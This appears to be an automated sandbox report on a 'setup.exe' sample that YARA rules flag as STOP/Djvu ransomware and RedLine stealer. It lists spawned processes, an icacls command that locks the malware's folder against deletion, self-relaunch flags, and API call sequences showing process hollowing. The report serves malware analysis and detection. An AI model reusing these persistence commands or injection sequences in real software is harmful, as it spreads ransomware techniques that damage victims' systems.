              Click to jump to process

              Click to dive into process behavior distribution

              Click to jump to process

              Target ID:0
              Start time:19:04:34
              Start date:29/07/2024
              Path:C:\Users\user\Desktop\setup.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\Desktop\setup.exe"
              Imagebase:0x400000
              File size:759'808 bytes
              MD5 hash:13FD90197BA55324BD01B9FA97F5295A
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2088895615.0000000001F3C000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000000.00000002.2089132256.0000000002010000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000000.00000002.2089132256.0000000002010000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
              Reputation:low
              Has exited:true

              Target ID:2
              Start time:19:04:35
              Start date:29/07/2024
              Path:C:\Users\user\Desktop\setup.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\Desktop\setup.exe"
              Imagebase:0x400000
              File size:759'808 bytes
              MD5 hash:13FD90197BA55324BD01B9FA97F5295A
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
              • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
              Reputation:low
              Has exited:true

              Target ID:4
              Start time:19:04:38
              Start date:29/07/2024
              Path:C:\Windows\SysWOW64\icacls.exe
              Wow64 process (32bit):true
              Commandline:icacls "C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0" /deny *S-1-1-0:(OI)(CI)(DE,DC)
              Imagebase:0x770000
              File size:29'696 bytes
              MD5 hash:2E49585E4E08565F52090B144062F97E
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:5
              Start time:19:04:38
              Start date:29/07/2024
              Path:C:\Users\user\Desktop\setup.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\Desktop\setup.exe" --Admin IsNotAutoStart IsNotTask
              Imagebase:0x400000
              File size:759'808 bytes
              MD5 hash:13FD90197BA55324BD01B9FA97F5295A
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.2127962943.000000000064A000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000005.00000002.2128184968.0000000002070000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000005.00000002.2128184968.0000000002070000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
              Reputation:low
              Has exited:true

              Target ID:6
              Start time:19:04:39
              Start date:29/07/2024
              Path:C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exe
              Wow64 process (32bit):false
              Commandline:C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exe --Task
              Imagebase:0x400000
              File size:759'808 bytes
              MD5 hash:13FD90197BA55324BD01B9FA97F5295A
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Reputation:low
              Has exited:true

              Target ID:7
              Start time:19:04:39
              Start date:29/07/2024
              Path:C:\Users\user\Desktop\setup.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\Desktop\setup.exe" --Admin IsNotAutoStart IsNotTask
              Imagebase:0x400000
              File size:759'808 bytes
              MD5 hash:13FD90197BA55324BD01B9FA97F5295A
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
              • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
              Reputation:low
              Has exited:true

              Target ID:8
              Start time:19:04:49
              Start date:29/07/2024
              Path:C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exe
              Wow64 process (32bit):false
              Commandline:"C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exe" --AutoStart
              Imagebase:0x400000
              File size:759'808 bytes
              MD5 hash:13FD90197BA55324BD01B9FA97F5295A
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Reputation:low
              Has exited:true

              Target ID:11
              Start time:19:04:50
              Start date:29/07/2024
              Path:C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exe" --AutoStart
              Imagebase:0x400000
              File size:759'808 bytes
              MD5 hash:13FD90197BA55324BD01B9FA97F5295A
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000B.00000002.2245296367.0000000000816000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000B.00000002.2245401585.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000B.00000002.2245401585.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
              Reputation:low
              Has exited:true

              Target ID:12
              Start time:19:04:51
              Start date:29/07/2024
              Path:C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exe" --AutoStart
              Imagebase:0x400000
              File size:759'808 bytes
              MD5 hash:13FD90197BA55324BD01B9FA97F5295A
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000C.00000002.2255626212.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000C.00000002.2255626212.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
              • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000000C.00000002.2255626212.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
              Reputation:low
              Has exited:true

              Target ID:14
              Start time:19:04:57
              Start date:29/07/2024
              Path:C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exe
              Wow64 process (32bit):false
              Commandline:"C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exe" --AutoStart
              Imagebase:0x400000
              File size:759'808 bytes
              MD5 hash:13FD90197BA55324BD01B9FA97F5295A
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Reputation:low
              Has exited:true

              Target ID:16
              Start time:19:04:58
              Start date:29/07/2024
              Path:C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exe" --AutoStart
              Imagebase:0x400000
              File size:759'808 bytes
              MD5 hash:13FD90197BA55324BD01B9FA97F5295A
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000010.00000002.2324127923.0000000002016000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000010.00000002.2324184436.00000000020B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000010.00000002.2324184436.00000000020B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
              Reputation:low
              Has exited:true

              Target ID:17
              Start time:19:04:59
              Start date:29/07/2024
              Path:C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exe" --AutoStart
              Imagebase:0x400000
              File size:759'808 bytes
              MD5 hash:13FD90197BA55324BD01B9FA97F5295A
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000011.00000002.2337074777.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000011.00000002.2337074777.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
              • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000011.00000002.2337074777.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
              Reputation:low
              Has exited:true

              Reset < >

                Execution Graph

                Execution Coverage:1.2%
                Dynamic/Decrypted Code Coverage:27%
                Signature Coverage:25.5%
                Total number of Nodes:141
                Total number of Limit Nodes:22
                execution_graph 43133 2010000 43136 2010630 43133->43136 43135 2010005 43137 201064c 43136->43137 43139 2011577 43137->43139 43142 20105b0 43139->43142 43145 20105dc 43142->43145 43143 20105e2 GetFileAttributesA 43143->43145 43144 201061e 43145->43143 43145->43144 43147 2010420 43145->43147 43148 20104f3 43147->43148 43149 20104ff CreateWindowExA 43148->43149 43150 20104fa 43148->43150 43149->43150 43151 2010540 PostMessageA 43149->43151 43150->43145 43152 201055f 43151->43152 43152->43150 43154 2010110 VirtualAlloc GetModuleFileNameA 43152->43154 43155 2010414 43154->43155 43156 201017d CreateProcessA 43154->43156 43155->43152 43156->43155 43158 201025f VirtualFree VirtualAlloc Wow64GetThreadContext 43156->43158 43158->43155 43159 20102a9 ReadProcessMemory 43158->43159 43160 20102e5 VirtualAllocEx NtWriteVirtualMemory 43159->43160 43161 20102d5 NtUnmapViewOfSection 43159->43161 43162 201033b 43160->43162 43161->43160 43163 2010350 NtWriteVirtualMemory 43162->43163 43164 201039d WriteProcessMemory Wow64SetThreadContext ResumeThread 43162->43164 43163->43162 43165 20103fb ExitProcess 43164->43165 43167 1f3c000 43170 1f3c026 43167->43170 43171 1f3c035 43170->43171 43174 1f3c7c6 43171->43174 43175 1f3c7e1 43174->43175 43176 1f3c7ea CreateToolhelp32Snapshot 43175->43176 43177 1f3c806 Module32First 43175->43177 43176->43175 43176->43177 43178 1f3c815 43177->43178 43179 1f3c025 43177->43179 43181 1f3c485 43178->43181 43182 1f3c4b0 43181->43182 43183 1f3c4c1 VirtualAlloc 43182->43183 43184 1f3c4f9 43182->43184 43183->43184 43184->43184 43185 4095f4 43235 40d3b0 43185->43235 43187 409600 GetStartupInfoW 43188 409614 HeapSetInformation 43187->43188 43190 40961f 43187->43190 43188->43190 43236 40b8d0 HeapCreate 43190->43236 43191 40966d 43192 409678 43191->43192 43272 4095cb 65 API calls 3 library calls 43191->43272 43273 40c8c4 85 API calls 4 library calls 43192->43273 43195 40967e 43196 409682 43195->43196 43197 40968a __RTC_Initialize 43195->43197 43274 4095cb 65 API calls 3 library calls 43196->43274 43237 40f93e 72 API calls __calloc_crt 43197->43237 43199 409689 43199->43197 43201 409697 43202 4096a3 GetCommandLineA 43201->43202 43203 40969b 43201->43203 43238 40f8a7 70 API calls 2 library calls 43202->43238 43275 40ce30 65 API calls 3 library calls 43203->43275 43207 4096b3 43276 40f7ec 90 API calls 3 library calls 43207->43276 43209 4096bd 43210 4096c1 43209->43210 43211 4096c9 43209->43211 43277 40ce30 65 API calls 3 library calls 43210->43277 43239 40f576 89 API calls 7 library calls 43211->43239 43214 4096ce 43216 4096d2 43214->43216 43217 4096da 43214->43217 43278 40ce30 65 API calls 3 library calls 43216->43278 43240 40cc0f 76 API calls 4 library calls 43217->43240 43221 4096e1 43222 4096e6 43221->43222 43223 4096ed 43221->43223 43279 40ce30 65 API calls 3 library calls 43222->43279 43241 40f517 89 API calls 2 library calls 43223->43241 43227 4096f2 43228 4096f8 43227->43228 43242 405be0 43227->43242 43228->43227 43231 40971c 43281 40ce12 65 API calls _doexit 43231->43281 43234 409721 __mtinitlocknum 43235->43187 43236->43191 43237->43201 43238->43207 43239->43214 43240->43221 43241->43227 43243 405bea __write_nolock 43242->43243 43244 405bfa FindExecutableA CoGetInstanceFromFile 43243->43244 43245 405cac 43243->43245 43311 4094dd 101 API calls 6 library calls 43244->43311 43248 405cdc LookupAccountSidW 43245->43248 43250 405d00 43245->43250 43247 405c29 43312 4094dd 101 API calls 6 library calls 43247->43312 43248->43245 43282 4058b0 43250->43282 43251 405c35 43313 4094c0 67 API calls _vwscanf 43251->43313 43254 405d0f 43254->43231 43280 40cde6 65 API calls _doexit 43254->43280 43255 405c42 43314 4094c0 67 API calls _vwscanf 43255->43314 43257 405c52 43315 409413 67 API calls __dosmaperr 43257->43315 43259 405c59 43316 4093e0 67 API calls __dosmaperr 43259->43316 43261 405c62 43317 409413 67 API calls __dosmaperr 43261->43317 43263 405c6c 43318 407950 114 API calls 43263->43318 43265 405c7c 43319 4094dd 101 API calls 6 library calls 43265->43319 43267 405c90 43320 40934c 65 API calls 4 library calls 43267->43320 43269 405c97 43321 40929f 68 API calls 4 library calls 43269->43321 43271 405ca0 43271->43245 43272->43192 43273->43195 43274->43199 43276->43209 43280->43231 43281->43234 43283 4058c0 43282->43283 43284 4058df AddRefActCtx 43283->43284 43285 4058ef GlobalAlloc 43283->43285 43284->43283 43286 405930 43285->43286 43287 405935 FindNextFileW 43286->43287 43288 40594c EnumCalendarInfoExA EnumCalendarInfoA GetShortPathNameW CopyFileA 43286->43288 43293 405984 43286->43293 43287->43286 43288->43286 43289 4059be 43290 405a14 43289->43290 43291 4059c5 6 API calls 43289->43291 43294 405a20 LoadMenuW 43290->43294 43291->43290 43292 40599d _llseek GetExitCodeThread 43292->43293 43293->43289 43293->43292 43324 405330 7 API calls 43293->43324 43294->43294 43295 405a29 43294->43295 43297 405a48 AddAtomA SleepEx 43295->43297 43299 405a55 43295->43299 43297->43295 43298 405a6d SetLastError 43298->43299 43299->43298 43300 405a92 43299->43300 43322 405440 LoadLibraryA GetProcAddress VirtualProtect 43300->43322 43302 405a9e 43303 405ae9 GetCurrentThreadId WritePrivateProfileSectionA GetConsoleAliasW GlobalLock 43302->43303 43304 405b16 43302->43304 43303->43302 43323 405140 LoadLibraryA 43304->43323 43306 405b1b 43307 405b34 9 API calls 43306->43307 43310 405bcb 43306->43310 43325 408d30 43307->43325 43309 405bbb SetDefaultCommConfigA 43309->43310 43310->43254 43311->43247 43312->43251 43313->43255 43314->43257 43315->43259 43316->43261 43317->43263 43318->43265 43319->43267 43320->43269 43321->43271 43322->43302 43323->43306 43324->43293 43325->43309

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 53 405440-40588f LoadLibraryA GetProcAddress VirtualProtect
                APIs
                • LoadLibraryA.KERNEL32(msimg32.dll), ref: 00405471
                • GetProcAddress.KERNEL32(?,msimg32.dll), ref: 00405866
                • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 00405886
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2087749655.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.2087707377.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087799205.000000000041A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087896117.00000000004AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087896117.0000000000528000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2088183964.000000000052B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_setup.jbxd
                Similarity
                • API ID: AddressLibraryLoadProcProtectVirtual
                • String ID: %b5;$0P%G$IVE$Jb%$Jo $V%7($msimg32.dll$mn@$oQZ$kiu
                • API String ID: 3509694964-212567100
                • Opcode ID: faf5d24532d9e5c2fb9d6e16dd12adac41eaab7f8bd8b53d7e58a87a1164c013
                • Instruction ID: 3c93bbe8d78a3f5d559adcfe0d16eff1c9bcb5cd25698e4889c3577372872ef2
                • Opcode Fuzzy Hash: faf5d24532d9e5c2fb9d6e16dd12adac41eaab7f8bd8b53d7e58a87a1164c013
                • Instruction Fuzzy Hash: 6AA1EBB5608384CFC254CF6AD48960AFBF4BB99358F644A0CF5A59B620C374DA85CF4B

                Control-flow Graph

                APIs
                • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 02010156
                • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0201016C
                • CreateProcessA.KERNELBASE(?,00000000), ref: 02010255
                • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02010270
                • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02010283
                • Wow64GetThreadContext.KERNEL32(00000000,?), ref: 0201029F
                • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 020102C8
                • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 020102E3
                • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 02010304
                • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 0201032A
                • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 02010399
                • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 020103BF
                • Wow64SetThreadContext.KERNEL32(00000000,?), ref: 020103E1
                • ResumeThread.KERNELBASE(00000000), ref: 020103ED
                • ExitProcess.KERNEL32(00000000), ref: 02010412
                Memory Dump Source
                • Source File: 00000000.00000002.2089132256.0000000002010000.00000040.00001000.00020000.00000000.sdmp, Offset: 02010000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2010000_setup.jbxd
                Yara matches
                Similarity
                • API ID: Virtual$MemoryProcess$AllocThreadWrite$ContextWow64$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
                • String ID:
                • API String ID: 93872480-0
                • Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                • Instruction ID: 021d515cfb6c8ad095ae65df10810aa084e5b883b092d05c2814b28e9fdfaba0
                • Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                • Instruction Fuzzy Hash: 7BB1C874A00208AFDB44CF98C895F9EBBB5FF88314F248158E949AB391D771AD81CF94

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 96 1f3c7c6-1f3c7df 97 1f3c7e1-1f3c7e3 96->97 98 1f3c7e5 97->98 99 1f3c7ea-1f3c7f6 CreateToolhelp32Snapshot 97->99 98->99 100 1f3c806-1f3c813 Module32First 99->100 101 1f3c7f8-1f3c7fe 99->101 102 1f3c815-1f3c816 call 1f3c485 100->102 103 1f3c81c-1f3c824 100->103 101->100 106 1f3c800-1f3c804 101->106 107 1f3c81b 102->107 106->97 106->100 107->103
                APIs
                • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 01F3C7EE
                • Module32First.KERNEL32(00000000,00000224), ref: 01F3C80E
                Memory Dump Source
                • Source File: 00000000.00000002.2088895615.0000000001F3C000.00000040.00000020.00020000.00000000.sdmp, Offset: 01F3C000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1f3c000_setup.jbxd
                Yara matches
                Similarity
                • API ID: CreateFirstModule32SnapshotToolhelp32
                • String ID:
                • API String ID: 3833638111-0
                • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                • Instruction ID: 1d0180ff44cea3a80db53f4d0240a1834fa5c527cffdcc1540e5afd470189e40
                • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                • Instruction Fuzzy Hash: E1F0FC32500310BFE7203FF89C8DB6E76E8AFC4635F100129E643E10C0C771E9454650

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 0 4058b0-4058be 1 4058c0-4058c6 0->1 2 4058d3-4058dd 1->2 3 4058c8-4058cd 1->3 4 4058e6-4058ed 2->4 5 4058df-4058e4 AddRefActCtx 2->5 3->2 4->1 6 4058ef-40592a GlobalAlloc 4->6 5->4 7 405930-405933 6->7 8 405935-405942 FindNextFileW 7->8 9 405947-40594a 7->9 8->9 10 40594c-405979 EnumCalendarInfoExA EnumCalendarInfoA GetShortPathNameW CopyFileA 9->10 11 40597e-405982 9->11 10->11 11->7 12 405984-405988 11->12 13 40598a-405990 12->13 14 4059be-4059c3 12->14 15 405996-40599b 13->15 16 405a14-405a1f 14->16 17 4059c5-405a0e AddAtomW GetSystemDirectoryW EnumTimeFormatsW GetSystemWindowsDirectoryA SetCalendarInfoA lstrcmpA 14->17 18 40599d-4059ac _llseek GetExitCodeThread 15->18 19 4059ae-4059bc call 405330 15->19 20 405a20-405a27 LoadMenuW 16->20 17->16 18->19 19->14 19->15 20->20 21 405a29-405a3f 20->21 23 405a40-405a46 21->23 25 405a52-405a53 23->25 26 405a48-405a50 AddAtomA SleepEx 23->26 25->23 27 405a55-405a63 25->27 26->25 28 405a65-405a6b 27->28 29 405a71-405a77 28->29 30 405a6d-405a6f SetLastError 28->30 31 405a89-405a90 29->31 32 405a79-405a7f 29->32 30->29 31->28 34 405a92-405ada call 405440 call 405300 call 405420 31->34 32->31 33 405a81-405a87 32->33 33->31 33->34 41 405ae0-405ae7 34->41 42 405b10-405b14 41->42 43 405ae9-405b0e GetCurrentThreadId WritePrivateProfileSectionA GetConsoleAliasW GlobalLock 41->43 42->41 44 405b16 call 405140 42->44 43->42 46 405b1b-405b2e 44->46 47 405b34-405bc5 LocalFlags UnhandledExceptionFilter FindNextFileW InterlockedCompareExchange GetModuleHandleW WriteFileGather EnumResourceTypesW GetFileAttributesW OpenWaitableTimerW call 408d30 SetDefaultCommConfigA 46->47 48 405bcb-405bda call 405410 46->48 47->48
                APIs
                • AddRefActCtx.KERNEL32(?), ref: 004058E4
                • GlobalAlloc.KERNELBASE(00000000,?), ref: 004058FA
                • FindNextFileW.KERNEL32(00000000,?), ref: 0040593C
                • EnumCalendarInfoExA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00405954
                • EnumCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040595E
                • GetShortPathNameW.KERNEL32(zedij,?,00000000), ref: 0040596F
                • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00405977
                • _llseek.KERNEL32(00000000,00000000,00000000), ref: 004059A3
                • GetExitCodeThread.KERNEL32(00000000,00000000), ref: 004059AC
                • AddAtomW.KERNEL32(fukowoxisiravusehuhedasituwucovefetenaxogukulirevok), ref: 004059CA
                • GetSystemDirectoryW.KERNEL32(?,00000000), ref: 004059DA
                • EnumTimeFormatsW.KERNEL32(00000000,00000000,00000000), ref: 004059E6
                • GetSystemWindowsDirectoryA.KERNEL32(00000000,00000000), ref: 004059F0
                • SetCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004059FE
                • lstrcmpA.KERNEL32(Hanoc yocecaj dij,Fer wadamopenobumi bufexixopi zoz winagemecadis), ref: 00405A0E
                • LoadMenuW.USER32(00000000,00000000), ref: 00405A24
                • AddAtomA.KERNEL32(00000000), ref: 00405A4A
                • SleepEx.KERNEL32(00000000,00000000), ref: 00405A50
                • SetLastError.KERNEL32(00000000), ref: 00405A6F
                • GetCurrentThreadId.KERNEL32 ref: 00405AE9
                • WritePrivateProfileSectionA.KERNEL32(Yidefafisomo hotecuf gibonekupufu rotipowetalix moriwi,Jefi xabusefuvo wamefipafagos gafifasudagetif naya,Katijaw xocuwiyoc), ref: 00405AFA
                • GetConsoleAliasW.KERNEL32(00000000,?,00000000,00000000), ref: 00405B0A
                • GlobalLock.KERNEL32(00000000), ref: 00405B0E
                • LocalFlags.KERNEL32(00000000), ref: 00405B37
                • UnhandledExceptionFilter.KERNEL32(00000000), ref: 00405B3E
                • FindNextFileW.KERNEL32(00000000,?), ref: 00405B4A
                • InterlockedCompareExchange.KERNEL32(00000000,00000000,00000000), ref: 00405B57
                • GetModuleHandleW.KERNEL32(00000000), ref: 00405B5E
                • WriteFileGather.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 00405B83
                • EnumResourceTypesW.KERNEL32(00000000,00000000,00000000), ref: 00405B8C
                • GetFileAttributesW.KERNEL32(Tenu joyabak), ref: 00405B97
                • OpenWaitableTimerW.KERNEL32(00000000,00000000,Bipovey duz), ref: 00405BA4
                • _memset.LIBCMT ref: 00405BB6
                • SetDefaultCommConfigA.KERNEL32(00000000,?,00000000), ref: 00405BC5
                Strings
                • Tenu joyabak, xrefs: 00405B92
                • msimg32.dll, xrefs: 00405A92
                • Hanoc yocecaj dij, xrefs: 00405A09
                • zedij, xrefs: 0040596A
                • Jefi xabusefuvo wamefipafagos gafifasudagetif naya, xrefs: 00405AF0
                • Bipovey duz, xrefs: 00405B9D
                • Katijaw xocuwiyoc, xrefs: 00405AEB
                • fukowoxisiravusehuhedasituwucovefetenaxogukulirevok, xrefs: 004059C5
                • Fer wadamopenobumi bufexixopi zoz winagemecadis, xrefs: 00405A04
                • Yidefafisomo hotecuf gibonekupufu rotipowetalix moriwi, xrefs: 00405AF5
                Memory Dump Source
                • Source File: 00000000.00000002.2087749655.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.2087707377.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087799205.000000000041A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087896117.00000000004AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087896117.0000000000528000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2088183964.000000000052B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_setup.jbxd
                Similarity
                • API ID: File$Enum$CalendarInfo$AtomDirectoryFindGlobalNextSystemThreadWrite$AliasAllocAttributesCodeCommCompareConfigConsoleCopyCurrentDefaultErrorExceptionExchangeExitFilterFlagsFormatsGatherHandleInterlockedLastLoadLocalLockMenuModuleNameOpenPathPrivateProfileResourceSectionShortSleepTimeTimerTypesUnhandledWaitableWindows_llseek_memsetlstrcmp
                • String ID: Bipovey duz$Fer wadamopenobumi bufexixopi zoz winagemecadis$Hanoc yocecaj dij$Jefi xabusefuvo wamefipafagos gafifasudagetif naya$Katijaw xocuwiyoc$Tenu joyabak$Yidefafisomo hotecuf gibonekupufu rotipowetalix moriwi$fukowoxisiravusehuhedasituwucovefetenaxogukulirevok$msimg32.dll$zedij
                • API String ID: 1264181287-3756120325
                • Opcode ID: 16ddacbd7970175beeaffea6fc4ead55f4ed872aa6678b56829e405714458fab
                • Instruction ID: 14eb3c34b4b3381a2d16236b09038116252d46b83eff13ccc2b5f222a95b0490
                • Opcode Fuzzy Hash: 16ddacbd7970175beeaffea6fc4ead55f4ed872aa6678b56829e405714458fab
                • Instruction Fuzzy Hash: 0281E831644754ABE320EB60DD49F9B3BA8EB49711F00453AFA44B62F0C7B85845CFAE

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 69 2010420-20104f8 71 20104fa 69->71 72 20104ff-201053c CreateWindowExA 69->72 73 20105aa-20105ad 71->73 74 2010540-2010558 PostMessageA 72->74 75 201053e 72->75 76 201055f-2010563 74->76 75->73 76->73 77 2010565-2010579 76->77 77->73 79 201057b-2010582 77->79 80 2010584-2010588 79->80 81 20105a8 79->81 80->81 82 201058a-2010591 80->82 81->76 82->81 83 2010593-2010597 call 2010110 82->83 85 201059c-20105a5 83->85 85->81
                APIs
